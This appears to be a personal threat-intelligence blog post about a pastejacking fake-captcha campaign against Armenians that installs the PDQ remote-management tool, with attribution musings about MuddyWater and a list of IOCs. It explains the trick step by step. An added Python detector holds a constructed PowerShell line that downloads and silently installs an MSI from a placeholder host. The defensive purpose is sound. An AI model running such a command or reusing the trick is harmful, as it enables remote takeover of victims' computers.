Something phishy is happening in Armenia

Hi all, it has been a long time since I wrote a post here; this is because I usually share my short findings on Twitter, or in-depth analysis for the company I work for.

However, I often encounter some data that is uncertain and causes musings.

Since no one wants to hire me as a full-time threat intelligence analyst, I decided to share those musings with the community, as it might help others to better understand some threats.

Due to the fact that this is my personal blog, I will not use the strict structure of a report.

Instead, I will start with a freestyle analysis of an interesting attack I have spotted targeting Armenians; after that I will write my musings, as this attack might or might not be related to a known threat actor named MuddyWater.

Initial vector - benign office document:

I have found a minimal and benign Word document written in Armenian which contains a link at the bottom:


If we click on the link, a browser window will open the URL which displays a captcha message in Armenian:
If we click on the checkbox to solve the captcha, a pop-up will appear with instructions in Armenian; below is the translated version:
If this is the first time you encounter such a captcha challenge, don't be alarmed: this is a fake captcha attack technique called "pastejacking".

How it works - PasteJacking?

If you click on confirm, it copies for you the fake confirmation text "✅ I am not a robot - reCAPTCHA Verification ID: XXXXX".
However, the instructions also tell you to press a combination of keys: "Windows + R" opens the Windows Run box.
Pressing "Ctrl + V" will paste the copied text, but is that all it does?
The trick here is that the fake captcha text takes up exactly the whole visible space of the Run box's command field.
If you move the cursor left to the beginning, you will see that there is additional text before the fake captcha:


Overall, this is a nice social engineering trick that would work for people that are not tech-savvy.
This PasteJacking technique is not new, however recently it caught some new attention.
Furthermore, if you prefer someone speaking about it, John Hammond also has a video from a month ago explaining a different PasteJacking attack.
Perhaps the attackers watch his videos :)

What does it do? - Install RMM:


Below is the full text that is being copied:
Whoever falls for this social engineering trick will not actually be solving any captcha; instead, they will execute a PowerShell command that downloads and executes an MSI file from the same domain on which this fake captcha is hosted.
The verification ID and the filename saved to disk are randomized every time the page loads.
Before the fake captcha text there is the symbol # (hashtag), which starts a comment in PowerShell, so all of that text is ignored by the interpreter and is not used for anything except the social engineering.
The downloaded MSI is an installer for PDQ, a remote monitoring and management (RMM) tool, which is what the boys in the underground call a free and FUD (fully undetected) RAT (remote access tool).
This allows the attackers to take over the infected computer by abusing legitimate software.
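As an added, defender-side illustration (not code from this post or from the captcha kit it describes), the following Python checks process-creation command lines for the pattern described in the two sections above: a PowerShell download-and-run of an MSI, padded with a "#" comment that carries the fake-captcha text. The sample command lines, the domain example.invalid and the file names are constructed for this example.

```python
# Constructed sample process-creation command lines (not taken from the page).
# The first mimics the pastejacking pattern the post describes: a PowerShell
# download-and-run of an MSI, followed by a "#" comment holding the decoy text.
SAMPLES = [
    'powershell -w hidden -c "iwr http://example.invalid/i.msi -o $env:TEMP\\a.msi; '
    'msiexec /i $env:TEMP\\a.msi /qn" # ✅ "I am not a robot - reCAPTCHA Verification ID: 7391"',
    'powershell -NoProfile -File C:\\scripts\\backup.ps1 # nightly job',
    'notepad.exe C:\\Users\\me\\notes.txt',
]

# Wording the post reports in the decoy comment; matched case-insensitively.
DECOY_MARKERS = ("i am not a robot", "recaptcha", "verification id")


def split_ps_comment(cmdline: str):
    """Split a PowerShell command line into (effective code, trailing comment).

    Simplified scanner (assumption: good enough for one-liners): a '#' outside
    single/double quotes that starts a token begins a comment. PowerShell
    ignores everything after it, which is why the decoy text can be appended
    to the real command without changing what runs.
    """
    quote = None
    for i, ch in enumerate(cmdline):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "#" and (i == 0 or cmdline[i - 1].isspace()):
            return cmdline[:i].rstrip(), cmdline[i + 1:].strip()
    return cmdline.strip(), ""


def looks_like_pastejacking(cmdline: str) -> bool:
    """Flag the pattern from the post: PowerShell whose real code fetches and
    runs an MSI, padded with a comment containing fake-captcha wording."""
    code, comment = split_ps_comment(cmdline)
    low = code.lower()
    is_ps = "powershell" in low or "pwsh" in low
    downloads = any(t in low for t in ("iwr", "invoke-webrequest", "downloadfile", "curl "))
    runs_msi = ".msi" in low and ("msiexec" in low or "start-process" in low)
    decoy = any(m in comment.lower() for m in DECOY_MARKERS)
    return is_ps and decoy and (downloads or runs_msi)


def triage(lines):
    """Return the comment-stripped (effective) command of every flagged line,
    i.e. what the analyst sees after scrolling left in the Run box."""
    return [split_ps_comment(line)[0] for line in lines if looks_like_pastejacking(line)]
```

Running triage over Sysmon Event ID 1 or Windows 4688 command lines surfaces the real download-and-run command while discarding the decoy comment.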

Well, that was fun... now what? - Attribution Musings:

Most people at this point would either look for IOCs or, the more sophisticated ones, for TTPs, to check their networks against this or similar threats.
I, however, like at this point to understand who is behind the attack.
In many cases it is not easy to determine who is behind the attack, and this also applies to this case.
However, I do have some thoughts I would like to share, and perhaps some other researchers have observed very similar attacks that can be linked to this one.

Attribution challenges:

The attackers did not use any malicious file in the attack; they abused a legitimate RMM which other attackers can use as well.
I don't know how the benign Word document was sent, perhaps by email, but this might not be enough info to correlate to anything concrete.
This pastejacking technique is not new, and other attackers are also currently using it.
The domain the attackers used is behind Cloudflare.
I have found only a single such unique pastejacking attack.

Yes, But... :

Not that many attackers use PDQ RMM.
The attackers used the Armenian language instead of English; cyber-criminals would have used English for a higher success rate, so using Armenian specifically is very targeted.
Furthermore, the domain used in this attack impersonates the legitimate domain of the Armenian Police - https://police.am/
I have found only a single such unique pastejacking attack.

Into the rabbit hole:

I have taken a closer look at the captcha HTML source code and found some interesting things.
It looks like the attacker saved a page from the Armenian Police website as a baseline:


The attackers modified John Hammond's open-source pastejacking kit from GitHub, translating it into Armenian:
The attackers specifically added code to check whether those trying to view the captcha page are using Windows, as this method only works on Windows...
The attackers also changed the payload from MSHTA to PowerShell; this info will be important soon...

All the above makes it a very targeted, and some will even say sophisticated or advanced, attack.
Others might say this is a nice internal red team engagement.
Both might be true as we don't have all the necessary facts yet.

Since I have never worked in a professional threat intelligence company, I have no idea how attribution is exactly done, but I heard some people basically throw the TTPs into MITRE ATT&CK; the more, the merrier, as afterwards you should have only one threat actor that fits all the TTPs.
Basically, if it walks like a duck and quacks like a duck, it is a duck...

I highly do not recommend this method, for many reasons, but I will use it anyway just to prove my point, or not...

Although my capabilities are limited as an individual, I did encounter another case of PDQ RMM used by attackers in Armenia a month ago:
In this instance, PDQ RMM was hosted on what appears to be a legitimate compromised Armenian website.
At that time, I suspected that MuddyWater, an Iranian APT, was behind the attack; this is because Armenia has previously been targeted by Iranian APTs and MuddyWater had started using PDQ RMM at that time.
However, using compromised web-hosting is not exactly MuddyWater's usual TTP; they opt to abuse free web-hosting. Perhaps I was wrong in my assessment and the Armenian website compromise is not related to MuddyWater.

Having said that, two incidents involving PDQ RMM in Armenia within a time frame of a month do not sound like a coincidence.

Social engineering is the main attack vector of MuddyWater.
MuddyWater, which is also known as Static Kitten because their TTPs are mostly static, does change their TTPs slightly, usually by changing the free web-hosting or the free RMM they abuse.
In this sense, the captcha attack might be a new social engineering method from MuddyWater.
MuddyWater is also known to use open-source tools, in this case the "captcha kit".
Another staple TTP of MuddyWater is using PowerShell, and the kit's payload was specifically changed from MSHTA to PowerShell...

So we certainly do have overlap in TTPs, it walks like Muddy and quacks like Muddy, but is it Muddy?
I am personally not sure, because this new activity is just a single point, not even a cluster of activity, so although it perfectly fits the "Square Hole", it might fit other holes as well...

Alright, so far I have only been talking about technical TTPs; real threat intel is also done by linguistic experts who might say the Armenian is wrong and that it is clearly someone using a past or present tense that is only known to be used in an entirely different language... or simply a ChatGPT F*-up.
As you might notice, I am neither a language expert nor a geopolitical expert; however, I know how to use Google and ask the right questions, for example: who is the person mentioned in the initial benign Word document? Bagrat Galstanyan.
Both "Bagrat" and the Armenian economy are hot topics that might create instability in the country; Iran is known to interfere in other countries to create instability in them for its own profit, but take this with a grain of salt as I am not an expert in this domain.

So if we summarize it all and simplify it to this scheme from Mandiant, who are known TI experts, we can see if the analysis sticks and holds:


From a tactical perspective we are either in a pickle or straight golden.
Malware? What malware? The attackers abused PDQ RMM; however, if we go up the pyramid of pain, the tools and techniques do match those of MuddyWater.
We do have some issue with the infrastructure, but once again, attackers adapt and so should threat intelligence experts and defenders.

From an operational perspective, Armenians are being targeted with lures of ongoing political and economic challenges that might create instability in the country. While this is not much, it is something; Mandiant probably chose a pyramid figure on purpose, as going higher up the pyramid is more challenging.

From a strategic perspective, this once again perfectly fits Iranian APTs, specifically MuddyWater.
But as I mentioned earlier, take everything with a grain of salt; "if it fits, it sits" might apply to kittens, but maybe there is some copycat throwing false flags? Let's wait for the experts to shed some additional light, or not... as there are many more undocumented attacks than those that have been publicly attributed.

IOC Description
fec64dd6eb25bdc32a1125753ed9f17b4d27f3115a1c48d794cdd385b121417a Sha256 hash of a benign docx document with a link
police-am[.]info/news/view/galstanyan151026.html URL link inside the docx document hosting the recaptcha kit
dcb5fbd24b219eb6ed9ddedffc93ad34c0b498e14bdcdc933d08535659cbca51 Sha256 hash of the modified re-captcha kit
police-am[.]info/i.msi URL containing PDQ RMM
96f5bb770d363c54d6657b877c16e7559ba7cc6341f084fee64166b7760a8572 Sha256 of PDQ RMM from police-am[.]info
armenianeconomy[.]com/Desktop_app.zip URL containing ZIP with PDQ RMM
4da4da7034d90ac233918d6f852cc40866ad7d1279ca872a6d92859b0fc22f76 Sha256 of PDQ RMM from armenianeconomy[.]com
